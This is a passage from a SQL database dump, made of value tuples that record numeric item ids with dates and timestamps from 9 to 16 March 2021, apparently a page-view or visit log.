17:10:03'),(15763,3063,1,'2021-03-09','2021-03-09 17:10:14'),(15764,1586,1,'2021-03-09','2021-03-09 17:10:23'),(15765,1544,1,'2021-03-09','2021-03-09 17:10:33'),(15766,2457,1,'2021-03-09','2021-03-09 17:10:43'),(15767,3072,1,'2021-03-09','2021-03-09 17:10:53'),(15768,3060,1,'2021-03-09','2021-03-09 17:11:24'),(15769,3041,1,'2021-03-09','2021-03-09 17:11:33'),(15770,3083,1,'2021-03-09','2021-03-09 17:11:42'),(15771,3004,1,'2021-03-09','2021-03-09 17:11:52'),(15772,1606,1,'2021-03-09','2021-03-09 17:12:14'),(15773,2769,1,'2021-03-09','2021-03-09 17:12:33'),(15774,3005,1,'2021-03-09','2021-03-09 17:12:43'),(15775,1612,1,'2021-03-09','2021-03-09 17:12:53'),(15776,3006,1,'2021-03-09','2021-03-09 17:13:03'),(15777,1614,1,'2021-03-09','2021-03-09 17:13:13'),(15778,2965,1,'2021-03-09','2021-03-09 17:13:23'),(15779,2964,1,'2021-03-09','2021-03-09 17:13:33'),(15780,1610,1,'2021-03-09','2021-03-09 17:13:43'),(15781,1604,1,'2021-03-09','2021-03-09 17:14:22'),(15782,2704,1,'2021-03-09','2021-03-09 17:14:32'),(15783,1596,1,'2021-03-09','2021-03-09 17:14:42'),(15784,1594,1,'2021-03-09','2021-03-09 17:14:52'),(15785,1584,1,'2021-03-09','2021-03-09 17:15:03'),(15786,1590,1,'2021-03-09','2021-03-09 17:15:13'),(15787,1588,1,'2021-03-09','2021-03-09 17:15:22'),(15788,1592,1,'2021-03-09','2021-03-09 17:15:33'),(15789,1598,1,'2021-03-09','2021-03-09 17:15:42'),(15790,1766,1,'2021-03-09','2021-03-09 17:15:52'),(15791,486,1,'2021-03-09','2021-03-09 17:16:13'),(15792,488,1,'2021-03-09','2021-03-09 17:16:33'),(15793,485,1,'2021-03-09','2021-03-09 17:16:43'),(15794,480,1,'2021-03-09','2021-03-09 17:17:18'),(15795,478,1,'2021-03-09','2021-03-09 17:17:24'),(15796,482,1,'2021-03-09','2021-03-09 17:17:33'),(15797,476,1,'2021-03-09','2021-03-09 17:17:43'),(15798,479,1,'2021-03-09','2021-03-09 17:18:02'),(15799,481,1,'2021-03-09','2021-03-09 17:18:23'),(15800,477,1,'2021-03-09','2021-03-09 17:18:33'),(15801,483,1,'2021-03-09','2021-03-09 17:18:43'),(15802,472,1,'2021-03-09','2021-03-09 17:18:52'),(15803,484,1,'2021-03-09','2021-03-09 17:19:03'),(15804,1877,1,'2021-03-09','2021-03-09 17:19:13'),(15805,1872,1,'2021-03-09','2021-03-09 17:19:22'),(15806,1870,1,'2021-03-09','2021-03-09 17:19:32'),(15807,1774,1,'2021-03-09','2021-03-09 17:20:38'),(15808,3030,1,'2021-03-09','2021-03-09 17:21:44'),(15809,1586,1,'2021-03-09','2021-03-09 17:27:17'),(15810,570,1,'2021-03-09','2021-03-09 18:05:14'),(15811,2395,1,'2021-03-09','2021-03-09 18:47:04'),(15812,1600,1,'2021-03-09','2021-03-09 20:12:29'),(15813,2159,1,'2021-03-09','2021-03-09 20:30:19'),(15814,3092,1,'2021-03-09','2021-03-09 20:48:23'),(15815,3261,1,'2021-03-09','2021-03-09 20:57:10'),(15816,1614,1,'2021-03-09','2021-03-09 20:59:23'),(15817,1586,1,'2021-03-09','2021-03-09 21:02:29'),(15818,2769,1,'2021-03-09','2021-03-09 21:38:45'),(15819,1582,1,'2021-03-09','2021-03-09 21:51:46'),(15820,80,1,'2021-03-09','2021-03-09 21:54:40'),(15821,2297,1,'2021-03-09','2021-03-09 21:59:45'),(15822,1586,1,'2021-03-09','2021-03-09 22:12:28'),(15823,2751,1,'2021-03-09','2021-03-09 23:11:53'),(15824,1586,1,'2021-03-09','2021-03-09 23:17:29'),(15825,1604,1,'2021-03-09','2021-03-09 23:35:55'),(15826,480,1,'2021-03-10','2021-03-10 00:44:58'),(15827,1766,1,'2021-03-10','2021-03-10 01:04:05'),(15828,1586,1,'2021-03-10','2021-03-10 01:16:16'),(15829,1718,1,'2021-03-10','2021-03-10 01:35:21'),(15830,2159,1,'2021-03-10','2021-03-10 01:46:52'),(15831,2558,1,'2021-03-10','2021-03-10 02:23:06'),(15832,570,1,'2021-03-10','2021-03-10 02:27:24'),(15833,1600,1,'2021-03-10','2021-03-10 02:36:42'),(15834,2154,1,'2021-03-10','2021-03-10 04:11:32'),(15835,2769,1,'2021-03-10','2021-03-10 04:12:53'),(15836,2309,1,'2021-03-10','2021-03-10 04:38:11'),(15837,1606,1,'2021-03-10','2021-03-10 04:40:50'),(15838,80,1,'2021-03-10','2021-03-10 04:43:30'),(15839,68,1,'2021-03-10','2021-03-10 05:10:15'),(15840,1586,1,'2021-03-10','2021-03-10 05:22:16'),(15841,80,1,'2021-03-10','2021-03-10 05:22:32'),(15842,2989,1,'2021-03-10','2021-03-10 05:57:28'),(15843,1586,1,'2021-03-10','2021-03-10 06:29:56'),(15844,1596,1,'2021-03-10','2021-03-10 06:45:43'),(15845,1602,1,'2021-03-10','2021-03-10 06:46:06'),(15846,1586,1,'2021-03-10','2021-03-10 07:09:53'),(15847,1699,1,'2021-03-10','2021-03-10 07:11:21'),(15848,1699,1,'2021-03-10','2021-03-10 07:11:32'),(15849,1699,1,'2021-03-10','2021-03-10 07:11:51'),(15850,1608,1,'2021-03-10','2021-03-10 07:24:10'),(15851,1602,1,'2021-03-10','2021-03-10 07:36:01'),(15852,1604,1,'2021-03-10','2021-03-10 08:07:54'),(15853,3261,1,'2021-03-10','2021-03-10 08:09:58'),(15854,2309,1,'2021-03-10','2021-03-10 08:12:13'),(15855,3092,1,'2021-03-10','2021-03-10 09:10:20'),(15856,3055,1,'2021-03-10','2021-03-10 09:39:58'),(15857,68,1,'2021-03-10','2021-03-10 10:01:13'),(15858,335,1,'2021-03-10','2021-03-10 10:01:54'),(15859,3534,1,'2021-03-10','2021-03-10 10:03:38'),(15860,68,1,'2021-03-10','2021-03-10 10:04:34'),(15861,1586,1,'2021-03-10','2021-03-10 10:09:49'),(15862,2971,1,'2021-03-10','2021-03-10 10:09:57'),(15863,1586,1,'2021-03-10','2021-03-10 10:14:37'),(15864,3127,1,'2021-03-10','2021-03-10 10:15:10'),(15865,1600,1,'2021-03-10','2021-03-10 10:32:08'),(15866,1602,1,'2021-03-10','2021-03-10 10:39:59'),(15867,3265,1,'2021-03-10','2021-03-10 10:40:05'),(15868,2159,1,'2021-03-10','2021-03-10 11:10:06'),(15869,3079,1,'2021-03-10','2021-03-10 11:10:40'),(15870,470,1,'2021-03-10','2021-03-10 11:40:35'),(15871,2609,1,'2021-03-10','2021-03-10 12:00:58'),(15872,2309,1,'2021-03-10','2021-03-10 12:11:13'),(15873,3099,1,'2021-03-10','2021-03-10 12:25:31'),(15874,3273,1,'2021-03-10','2021-03-10 12:28:01'),(15875,2395,1,'2021-03-10','2021-03-10 12:30:50'),(15876,1612,1,'2021-03-10','2021-03-10 13:23:50'),(15877,80,1,'2021-03-10','2021-03-10 13:24:53'),(15878,2309,1,'2021-03-10','2021-03-10 13:31:16'),(15879,2769,1,'2021-03-10','2021-03-10 13:41:40'),(15880,1582,1,'2021-03-10','2021-03-10 14:21:53'),(15881,1604,1,'2021-03-10','2021-03-10 14:41:53'),(15882,3099,1,'2021-03-10','2021-03-10 14:51:49'),(15883,2154,1,'2021-03-10','2021-03-10 15:01:17'),(15884,1586,1,'2021-03-10','2021-03-10 15:08:30'),(15885,2704,1,'2021-03-10','2021-03-10 15:09:01'),(15886,1586,1,'2021-03-10','2021-03-10 15:09:06'),(15887,3099,1,'2021-03-10','2021-03-10 15:21:18'),(15888,2558,1,'2021-03-10','2021-03-10 15:31:18'),(15889,1608,1,'2021-03-10','2021-03-10 15:34:58'),(15890,76,1,'2021-03-10','2021-03-10 15:36:11'),(15891,2159,1,'2021-03-10','2021-03-10 16:12:00'),(15892,3087,1,'2021-03-10','2021-03-10 16:51:56'),(15893,2410,1,'2021-03-10','2021-03-10 17:01:55'),(15894,1604,1,'2021-03-10','2021-03-10 17:12:28'),(15895,2297,1,'2021-03-10','2021-03-10 17:26:44'),(15896,2410,1,'2021-03-10','2021-03-10 17:32:44'),(15897,2503,1,'2021-03-10','2021-03-10 17:42:58'),(15898,1582,1,'2021-03-10','2021-03-10 18:03:57'),(15899,80,1,'2021-03-10','2021-03-10 18:23:01'),(15900,2178,1,'2021-03-10','2021-03-10 18:36:11'),(15901,1592,1,'2021-03-10','2021-03-10 19:03:37'),(15902,484,1,'2021-03-10','2021-03-10 19:28:21'),(15903,91,1,'2021-03-10','2021-03-10 19:29:04'),(15904,1586,1,'2021-03-10','2021-03-10 19:33:33'),(15905,484,1,'2021-03-10','2021-03-10 19:34:38'),(15906,2911,1,'2021-03-10','2021-03-10 20:08:35'),(15907,2911,1,'2021-03-10','2021-03-10 20:08:37'),(15908,2911,1,'2021-03-10','2021-03-10 20:08:38'),(15909,3063,1,'2021-03-10','2021-03-10 20:09:05'),(15910,3063,1,'2021-03-10','2021-03-10 20:09:06'),(15911,2911,1,'2021-03-10','2021-03-10 20:09:26'),(15912,1720,1,'2021-03-10','2021-03-10 20:13:50'),(15913,3056,1,'2021-03-10','2021-03-10 20:19:25'),(15914,2159,1,'2021-03-10','2021-03-10 20:33:31'),(15915,2309,1,'2021-03-10','2021-03-10 22:13:42'),(15916,1586,1,'2021-03-10','2021-03-10 22:31:52'),(15917,1586,1,'2021-03-10','2021-03-10 22:32:31'),(15918,1586,1,'2021-03-10','2021-03-10 22:39:20'),(15919,1602,1,'2021-03-10','2021-03-10 22:43:39'),(15920,1598,1,'2021-03-10','2021-03-10 22:55:00'),(15921,1598,1,'2021-03-10','2021-03-10 22:55:18'),(15922,1709,1,'2021-03-10','2021-03-10 23:22:48'),(15923,3079,1,'2021-03-10','2021-03-10 23:25:40'),(15924,2769,1,'2021-03-10','2021-03-10 23:53:38'),(15925,2609,1,'2021-03-11','2021-03-11 00:03:27'),(15926,2297,1,'2021-03-11','2021-03-11 00:04:12'),(15927,3055,1,'2021-03-11','2021-03-11 00:56:12'),(15928,1588,1,'2021-03-11','2021-03-11 01:03:41'),(15929,1604,1,'2021-03-11','2021-03-11 02:43:24'),(15930,2410,1,'2021-03-11','2021-03-11 03:14:23'),(15931,2178,1,'2021-03-11','2021-03-11 03:55:15'),(15932,2159,1,'2021-03-11','2021-03-11 04:07:45'),(15933,80,1,'2021-03-11','2021-03-11 04:16:31'),(15934,1586,1,'2021-03-11','2021-03-11 04:36:40'),(15935,1612,1,'2021-03-11','2021-03-11 05:00:00'),(15936,1600,1,'2021-03-11','2021-03-11 06:33:36'),(15937,2159,1,'2021-03-11','2021-03-11 07:22:28'),(15938,2911,1,'2021-03-11','2021-03-11 07:38:26'),(15939,3489,1,'2021-03-11','2021-03-11 07:43:57'),(15940,2309,1,'2021-03-11','2021-03-11 07:54:34'),(15941,1612,1,'2021-03-11','2021-03-11 08:09:09'),(15942,2309,1,'2021-03-11','2021-03-11 08:11:55'),(15943,1766,1,'2021-03-11','2021-03-11 08:16:36'),(15944,1612,1,'2021-03-11','2021-03-11 09:00:39'),(15945,2769,1,'2021-03-11','2021-03-11 09:14:58'),(15946,1608,1,'2021-03-11','2021-03-11 09:29:03'),(15947,2609,1,'2021-03-11','2021-03-11 09:34:30'),(15948,570,1,'2021-03-11','2021-03-11 09:38:28'),(15949,1586,1,'2021-03-11','2021-03-11 09:56:07'),(15950,1612,1,'2021-03-11','2021-03-11 10:09:35'),(15951,1598,1,'2021-03-11','2021-03-11 10:15:39'),(15952,1602,1,'2021-03-11','2021-03-11 10:34:55'),(15953,3486,1,'2021-03-11','2021-03-11 10:35:51'),(15954,1592,1,'2021-03-11','2021-03-11 10:41:31'),(15955,68,1,'2021-03-11','2021-03-11 10:51:51'),(15956,87,1,'2021-03-11','2021-03-11 10:55:30'),(15957,87,1,'2021-03-11','2021-03-11 11:12:23'),(15958,2503,1,'2021-03-11','2021-03-11 11:37:26'),(15959,1586,1,'2021-03-11','2021-03-11 12:08:47'),(15960,1612,1,'2021-03-11','2021-03-11 12:27:30'),(15961,84,1,'2021-03-11','2021-03-11 12:28:37'),(15962,87,1,'2021-03-11','2021-03-11 12:28:58'),(15963,3109,1,'2021-03-11','2021-03-11 12:31:07'),(15964,87,1,'2021-03-11','2021-03-11 12:44:01'),(15965,84,1,'2021-03-11','2021-03-11 12:44:14'),(15966,1612,1,'2021-03-11','2021-03-11 12:44:23'),(15967,1586,1,'2021-03-11','2021-03-11 13:02:36'),(15968,80,1,'2021-03-11','2021-03-11 13:05:26'),(15969,2159,1,'2021-03-11','2021-03-11 13:07:38'),(15970,2457,1,'2021-03-11','2021-03-11 13:20:06'),(15971,1586,1,'2021-03-11','2021-03-11 13:48:27'),(15972,1604,1,'2021-03-11','2021-03-11 13:58:09'),(15973,2609,1,'2021-03-11','2021-03-11 14:08:20'),(15974,68,1,'2021-03-11','2021-03-11 14:15:18'),(15975,76,1,'2021-03-11','2021-03-11 14:25:59'),(15976,91,1,'2021-03-11','2021-03-11 14:28:16'),(15977,1586,1,'2021-03-11','2021-03-11 14:57:00'),(15978,3069,1,'2021-03-11','2021-03-11 14:58:02'),(15979,3066,1,'2021-03-11','2021-03-11 15:01:35'),(15980,72,1,'2021-03-11','2021-03-11 15:06:41'),(15981,1606,1,'2021-03-11','2021-03-11 15:18:37'),(15982,1606,1,'2021-03-11','2021-03-11 15:21:29'),(15983,2704,1,'2021-03-11','2021-03-11 15:26:20'),(15984,2159,1,'2021-03-11','2021-03-11 15:38:59'),(15985,1586,1,'2021-03-11','2021-03-11 15:40:09'),(15986,76,1,'2021-03-11','2021-03-11 15:41:07'),(15987,570,1,'2021-03-11','2021-03-11 15:59:17'),(15988,1586,1,'2021-03-11','2021-03-11 15:59:39'),(15989,2617,1,'2021-03-11','2021-03-11 16:33:42'),(15990,1596,1,'2021-03-11','2021-03-11 16:44:39'),(15991,1596,1,'2021-03-11','2021-03-11 16:44:48'),(15992,1606,1,'2021-03-11','2021-03-11 17:08:15'),(15993,2309,1,'2021-03-11','2021-03-11 17:30:17'),(15994,1586,1,'2021-03-11','2021-03-11 18:13:11'),(15995,1586,1,'2021-03-11','2021-03-11 18:13:11'),(15996,80,1,'2021-03-11','2021-03-11 18:48:56'),(15997,2769,1,'2021-03-11','2021-03-11 19:10:18'),(15998,1588,1,'2021-03-11','2021-03-11 19:20:08'),(15999,1586,1,'2021-03-11','2021-03-11 19:30:12'),(16000,1586,1,'2021-03-11','2021-03-11 19:49:20'),(16001,1586,1,'2021-03-11','2021-03-11 19:49:21'),(16002,1586,1,'2021-03-11','2021-03-11 19:49:23'),(16003,1586,1,'2021-03-11','2021-03-11 19:49:43'),(16004,3257,1,'2021-03-11','2021-03-11 19:51:01'),(16005,1598,1,'2021-03-11','2021-03-11 20:58:35'),(16006,1602,1,'2021-03-11','2021-03-11 21:02:02'),(16007,1602,1,'2021-03-11','2021-03-11 21:04:14'),(16008,1600,1,'2021-03-11','2021-03-11 21:07:37'),(16009,1610,1,'2021-03-11','2021-03-11 21:33:16'),(16010,1586,1,'2021-03-11','2021-03-11 21:42:44'),(16011,1586,1,'2021-03-11','2021-03-11 21:42:45'),(16012,1586,1,'2021-03-11','2021-03-11 22:59:37'),(16013,1586,1,'2021-03-11','2021-03-11 23:14:48'),(16014,1586,1,'2021-03-11','2021-03-11 23:14:48'),(16015,1586,1,'2021-03-11','2021-03-11 23:15:12'),(16016,91,1,'2021-03-11','2021-03-11 23:23:15'),(16017,1602,1,'2021-03-11','2021-03-11 23:43:04'),(16018,1544,1,'2021-03-11','2021-03-11 23:43:40'),(16019,1544,1,'2021-03-11','2021-03-11 23:44:10'),(16020,1600,1,'2021-03-11','2021-03-11 23:52:48'),(16021,2159,1,'2021-03-12','2021-03-12 00:52:23'),(16022,1600,1,'2021-03-12','2021-03-12 00:54:18'),(16023,1604,1,'2021-03-12','2021-03-12 01:12:39'),(16024,2457,1,'2021-03-12','2021-03-12 01:16:56'),(16025,2457,1,'2021-03-12','2021-03-12 01:18:56'),(16026,2420,1,'2021-03-12','2021-03-12 01:56:02'),(16027,2609,1,'2021-03-12','2021-03-12 02:53:38'),(16028,2154,1,'2021-03-12','2021-03-12 03:16:38'),(16029,1582,1,'2021-03-12','2021-03-12 05:36:27'),(16030,1582,1,'2021-03-12','2021-03-12 08:06:58'),(16031,3290,1,'2021-03-12','2021-03-12 08:29:44'),(16032,1598,1,'2021-03-12','2021-03-12 09:25:50'),(16033,3083,1,'2021-03-12','2021-03-12 09:31:42'),(16034,473,1,'2021-03-12','2021-03-12 10:24:57'),(16035,80,1,'2021-03-12','2021-03-12 10:25:10'),(16036,470,1,'2021-03-12','2021-03-12 10:25:13'),(16037,1602,1,'2021-03-12','2021-03-12 10:35:30'),(16038,1610,1,'2021-03-12','2021-03-12 10:37:59'),(16039,1586,1,'2021-03-12','2021-03-12 10:44:51'),(16040,1596,1,'2021-03-12','2021-03-12 10:49:50'),(16041,91,1,'2021-03-12','2021-03-12 11:02:39'),(16042,3102,1,'2021-03-12','2021-03-12 11:03:31'),(16043,91,1,'2021-03-12','2021-03-12 11:04:19'),(16044,3261,1,'2021-03-12','2021-03-12 11:04:43'),(16045,1582,1,'2021-03-12','2021-03-12 11:05:29'),(16046,91,1,'2021-03-12','2021-03-12 11:10:03'),(16047,2457,1,'2021-03-12','2021-03-12 11:10:37'),(16048,91,1,'2021-03-12','2021-03-12 11:12:11'),(16049,1709,1,'2021-03-12','2021-03-12 11:14:29'),(16050,1709,1,'2021-03-12','2021-03-12 11:20:00'),(16051,2309,1,'2021-03-12','2021-03-12 11:24:57'),(16052,3287,1,'2021-03-12','2021-03-12 11:36:09'),(16053,91,1,'2021-03-12','2021-03-12 11:36:48'),(16054,3539,1,'2021-03-12','2021-03-12 11:43:28'),(16055,91,1,'2021-03-12','2021-03-12 11:45:26'),(16056,3539,1,'2021-03-12','2021-03-12 11:45:39'),(16057,91,1,'2021-03-12','2021-03-12 11:46:30'),(16058,3058,1,'2021-03-12','2021-03-12 12:56:07'),(16059,3285,1,'2021-03-12','2021-03-12 13:01:21'),(16060,91,1,'2021-03-12','2021-03-12 13:01:22'),(16061,1608,1,'2021-03-12','2021-03-12 13:08:50'),(16062,1586,1,'2021-03-12','2021-03-12 13:16:00'),(16063,84,1,'2021-03-12','2021-03-12 13:16:39'),(16064,2503,1,'2021-03-12','2021-03-12 13:20:16'),(16065,87,1,'2021-03-12','2021-03-12 13:20:37'),(16066,72,1,'2021-03-12','2021-03-12 13:21:30'),(16067,2503,1,'2021-03-12','2021-03-12 13:26:20'),(16068,1743,1,'2021-03-12','2021-03-12 13:45:22'),(16069,1709,1,'2021-03-12','2021-03-12 14:16:16'),(16070,108,1,'2021-03-12','2021-03-12 14:16:53'),(16071,68,1,'2021-03-12','2021-03-12 14:19:11'),(16072,2165,1,'2021-03-12','2021-03-12 14:19:42'),(16073,76,1,'2021-03-12','2021-03-12 14:20:03'),(16074,76,1,'2021-03-12','2021-03-12 14:29:51'),(16075,2309,1,'2021-03-12','2021-03-12 15:45:07'),(16076,3069,1,'2021-03-12','2021-03-12 16:33:41'),(16077,3069,1,'2021-03-12','2021-03-12 16:33:45'),(16078,1600,1,'2021-03-12','2021-03-12 16:36:10'),(16079,91,1,'2021-03-12','2021-03-12 16:39:59'),(16080,1582,1,'2021-03-12','2021-03-12 17:43:56'),(16081,3030,1,'2021-03-12','2021-03-12 17:56:49'),(16082,1602,1,'2021-03-12','2021-03-12 17:56:52'),(16083,1600,1,'2021-03-12','2021-03-12 18:22:21'),(16084,1600,1,'2021-03-12','2021-03-12 18:23:38'),(16085,2934,1,'2021-03-12','2021-03-12 19:47:43'),(16086,2309,1,'2021-03-12','2021-03-12 20:07:28'),(16087,3090,1,'2021-03-12','2021-03-12 22:11:37'),(16088,1614,1,'2021-03-12','2021-03-12 22:40:20'),(16089,3056,1,'2021-03-12','2021-03-12 22:41:41'),(16090,3079,1,'2021-03-12','2021-03-12 23:14:31'),(16091,3058,1,'2021-03-12','2021-03-12 23:22:24'),(16092,1612,1,'2021-03-12','2021-03-12 23:56:37'),(16093,2159,1,'2021-03-13','2021-03-13 00:53:16'),(16094,3482,1,'2021-03-13','2021-03-13 01:03:15'),(16095,2769,1,'2021-03-13','2021-03-13 01:41:53'),(16096,1596,1,'2021-03-13','2021-03-13 02:04:53'),(16097,2457,1,'2021-03-13','2021-03-13 02:17:18'),(16098,3030,1,'2021-03-13','2021-03-13 07:10:37'),(16099,2309,1,'2021-03-13','2021-03-13 08:45:46'),(16100,1598,1,'2021-03-13','2021-03-13 08:52:43'),(16101,1598,1,'2021-03-13','2021-03-13 08:52:44'),(16102,1598,1,'2021-03-13','2021-03-13 08:52:48'),(16103,1586,1,'2021-03-13','2021-03-13 09:25:12'),(16104,3079,1,'2021-03-13','2021-03-13 10:07:09'),(16105,2159,1,'2021-03-13','2021-03-13 11:15:53'),(16106,3038,1,'2021-03-13','2021-03-13 11:39:02'),(16107,2503,1,'2021-03-13','2021-03-13 11:55:45'),(16108,3056,1,'2021-03-13','2021-03-13 11:58:24'),(16109,2309,1,'2021-03-13','2021-03-13 12:19:39'),(16110,68,1,'2021-03-13','2021-03-13 12:27:00'),(16111,1586,1,'2021-03-13','2021-03-13 12:31:06'),(16112,3055,1,'2021-03-13','2021-03-13 12:33:44'),(16113,68,1,'2021-03-13','2021-03-13 12:38:53'),(16114,102,1,'2021-03-13','2021-03-13 13:09:00'),(16115,3482,1,'2021-03-13','2021-03-13 13:26:41'),(16116,1718,1,'2021-03-13','2021-03-13 13:35:46'),(16117,2159,1,'2021-03-13','2021-03-13 13:36:20'),(16118,474,1,'2021-03-13','2021-03-13 13:44:22'),(16119,1600,1,'2021-03-13','2021-03-13 13:56:51'),(16120,2769,1,'2021-03-13','2021-03-13 14:47:09'),(16121,1586,1,'2021-03-13','2021-03-13 15:54:35'),(16122,76,1,'2021-03-13','2021-03-13 15:55:20'),(16123,1596,1,'2021-03-13','2021-03-13 15:58:22'),(16124,3058,1,'2021-03-13','2021-03-13 15:58:31'),(16125,76,1,'2021-03-13','2021-03-13 15:58:52'),(16126,1586,1,'2021-03-13','2021-03-13 15:58:55'),(16127,3245,1,'2021-03-13','2021-03-13 16:48:32'),(16128,3271,1,'2021-03-13','2021-03-13 17:29:40'),(16129,1602,1,'2021-03-13','2021-03-13 19:04:51'),(16130,2309,1,'2021-03-13','2021-03-13 19:29:54'),(16131,1586,1,'2021-03-13','2021-03-13 21:02:05'),(16132,2309,1,'2021-03-13','2021-03-13 21:38:32'),(16133,2309,1,'2021-03-13','2021-03-13 21:38:37'),(16134,2309,1,'2021-03-13','2021-03-13 21:41:50'),(16135,1592,1,'2021-03-13','2021-03-13 21:52:47'),(16136,2503,1,'2021-03-13','2021-03-13 22:19:38'),(16137,1586,1,'2021-03-13','2021-03-13 22:38:46'),(16138,1586,1,'2021-03-13','2021-03-13 22:49:59'),(16139,3030,1,'2021-03-14','2021-03-14 00:19:43'),(16140,3058,1,'2021-03-14','2021-03-14 00:20:16'),(16141,3030,1,'2021-03-14','2021-03-14 00:50:15'),(16142,2159,1,'2021-03-14','2021-03-14 01:00:39'),(16143,2769,1,'2021-03-14','2021-03-14 02:10:37'),(16144,1600,1,'2021-03-14','2021-03-14 04:20:27'),(16145,1612,1,'2021-03-14','2021-03-14 07:31:05'),(16146,3083,1,'2021-03-14','2021-03-14 08:31:55'),(16147,2617,1,'2021-03-14','2021-03-14 08:53:11'),(16148,80,1,'2021-03-14','2021-03-14 08:54:56'),(16149,2309,1,'2021-03-14','2021-03-14 09:11:42'),(16150,2159,1,'2021-03-14','2021-03-14 09:41:55'),(16151,1711,1,'2021-03-14','2021-03-14 11:18:26'),(16152,89,1,'2021-03-14','2021-03-14 11:19:57'),(16153,1614,1,'2021-03-14','2021-03-14 11:21:18'),(16154,89,1,'2021-03-14','2021-03-14 11:21:40'),(16155,68,1,'2021-03-14','2021-03-14 11:22:01'),(16156,76,1,'2021-03-14','2021-03-14 11:22:23'),(16157,2503,1,'2021-03-14','2021-03-14 11:24:19'),(16158,1582,1,'2021-03-14','2021-03-14 11:31:23'),(16159,2609,1,'2021-03-14','2021-03-14 12:37:01'),(16160,2154,1,'2021-03-14','2021-03-14 12:58:26'),(16161,2503,1,'2021-03-14','2021-03-14 13:32:38'),(16162,3058,1,'2021-03-14','2021-03-14 13:52:25'),(16163,3038,1,'2021-03-14','2021-03-14 14:13:00'),(16164,1592,1,'2021-03-14','2021-03-14 15:02:48'),(16165,1600,1,'2021-03-14','2021-03-14 15:03:38'),(16166,2769,1,'2021-03-14','2021-03-14 15:45:30'),(16167,2309,1,'2021-03-14','2021-03-14 17:54:49'),(16168,3285,1,'2021-03-14','2021-03-14 19:28:13'),(16169,3245,1,'2021-03-14','2021-03-14 21:36:05'),(16170,2704,1,'2021-03-14','2021-03-14 21:46:01'),(16171,3030,1,'2021-03-14','2021-03-14 21:55:45'),(16172,1600,1,'2021-03-14','2021-03-14 22:36:30'),(16173,1600,1,'2021-03-14','2021-03-14 22:36:31'),(16174,1600,1,'2021-03-15','2021-03-15 00:37:29'),(16175,84,1,'2021-03-15','2021-03-15 00:40:26'),(16176,87,1,'2021-03-15','2021-03-15 00:43:59'),(16177,89,1,'2021-03-15','2021-03-15 00:48:14'),(16178,91,1,'2021-03-15','2021-03-15 00:50:04'),(16179,1726,1,'2021-03-15','2021-03-15 01:00:11'),(16180,91,1,'2021-03-15','2021-03-15 01:00:19'),(16181,80,1,'2021-03-15','2021-03-15 01:02:16'),(16182,91,1,'2021-03-15','2021-03-15 01:02:28'),(16183,89,1,'2021-03-15','2021-03-15 01:02:36'),(16184,87,1,'2021-03-15','2021-03-15 01:02:40'),(16185,84,1,'2021-03-15','2021-03-15 01:02:46'),(16186,1600,1,'2021-03-15','2021-03-15 01:02:49'),(16187,1722,1,'2021-03-15','2021-03-15 01:47:21'),(16188,2457,1,'2021-03-15','2021-03-15 01:47:35'),(16189,3055,1,'2021-03-15','2021-03-15 02:23:28'),(16190,3060,1,'2021-03-15','2021-03-15 03:17:15'),(16191,2993,1,'2021-03-15','2021-03-15 03:37:21'),(16192,3056,1,'2021-03-15','2021-03-15 03:53:22'),(16193,2161,1,'2021-03-15','2021-03-15 05:02:18'),(16194,91,1,'2021-03-15','2021-03-15 05:04:23'),(16195,2503,1,'2021-03-15','2021-03-15 08:51:49'),(16196,1614,1,'2021-03-15','2021-03-15 09:28:17'),(16197,1586,1,'2021-03-15','2021-03-15 09:34:18'),(16198,80,1,'2021-03-15','2021-03-15 09:34:30'),(16199,68,1,'2021-03-15','2021-03-15 09:37:25'),(16200,89,1,'2021-03-15','2021-03-15 09:37:49'),(16201,1586,1,'2021-03-15','2021-03-15 09:38:02'),(16202,1586,1,'2021-03-15','2021-03-15 10:55:15'),(16203,2309,1,'2021-03-15','2021-03-15 12:05:49'),(16204,1582,1,'2021-03-15','2021-03-15 12:06:40'),(16205,1582,1,'2021-03-15','2021-03-15 12:38:43'),(16206,1606,1,'2021-03-15','2021-03-15 12:49:49'),(16207,89,1,'2021-03-15','2021-03-15 13:39:44'),(16208,91,1,'2021-03-15','2021-03-15 13:41:05'),(16209,1602,1,'2021-03-15','2021-03-15 13:53:42'),(16210,80,1,'2021-03-15','2021-03-15 14:09:13'),(16211,1592,1,'2021-03-15','2021-03-15 14:15:48'),(16212,91,1,'2021-03-15','2021-03-15 14:15:59'),(16213,1718,1,'2021-03-15','2021-03-15 14:41:20'),(16214,2769,1,'2021-03-15','2021-03-15 15:08:22'),(16215,2769,1,'2021-03-15','2021-03-15 15:08:23'),(16216,1608,1,'2021-03-15','2021-03-15 15:17:00'),(16217,1608,1,'2021-03-15','2021-03-15 15:17:01'),(16218,1608,1,'2021-03-15','2021-03-15 15:17:06'),(16219,1608,1,'2021-03-15','2021-03-15 15:17:34'),(16220,3489,1,'2021-03-15','2021-03-15 15:21:46'),(16221,1604,1,'2021-03-15','2021-03-15 15:40:47'),(16222,1745,1,'2021-03-15','2021-03-15 16:00:51'),(16223,3269,1,'2021-03-15','2021-03-15 16:07:20'),(16224,1612,1,'2021-03-15','2021-03-15 17:51:10'),(16225,3486,1,'2021-03-16','2021-03-16 03:00:33'),(16226,1586,1,'2021-03-16','2021-03-16 04:22:24'),(16227,1586,1,'2021-03-16','2021-03-16 04:22:29'),(16228,1586,1,'2021-03-16','2021-03-16 04:29:56'),(16229,1586,1,'2021-03-16','2021-03-16 04:29:56'),(16230,1604,1,'2021-03-16','2021-03-16 07:19:16'),(16231,1602,1,'2021-03-16','2021-03-16 07:35:49'),(16232,2769,1,'2021-03-16','2021-03-16 08:04:40'),(16233,2769,1,'2021-03-16','2021-03-16 08:06:00'),(16234,76,1,'2021-03-16','2021-03-16 08:06:11'),(16235,76,1,'2021-03-16','2021-03-16 08:06:34'),(16236,2769,1,'2021-03-16','2021-03-16 08:06:36'),(16237,1614,1,'2021-03-16','2021-03-16 08:14:06'),(16238,1586,1,'2021-03-16','2021-03-16 08:27:02'),(16239,1713,1,'2021-03-16','2021-03-16 08:29:24'),(16240,1586,1,'2021-03-16','2021-03-16 08:31:17'),(16241,1594,1,'2021-03-16','2021-03-16 09:13:31'),(16242,2457,1,'2021-03-16','2021-03-16 09:14:18'),(16243,3030,1,'2021-03-16','2021-03-16 09:30:42'),(16244,1614,1,'2021-03-16','2021-03-16 09:42:14'),(16245,1614,1,'2021-03-16','2021-03-16 09:42:57'),(16246,91,1,'2021-03-16','2021-03-16 09:47:09'),(16247,3541,1,'2021-03-16','2021-03-16 09:51:52'),(16248,84,1,'2021-03-16','2021-03-16 09:56:50'),(16249,1877,1,'2021-03-16','2021-03-16 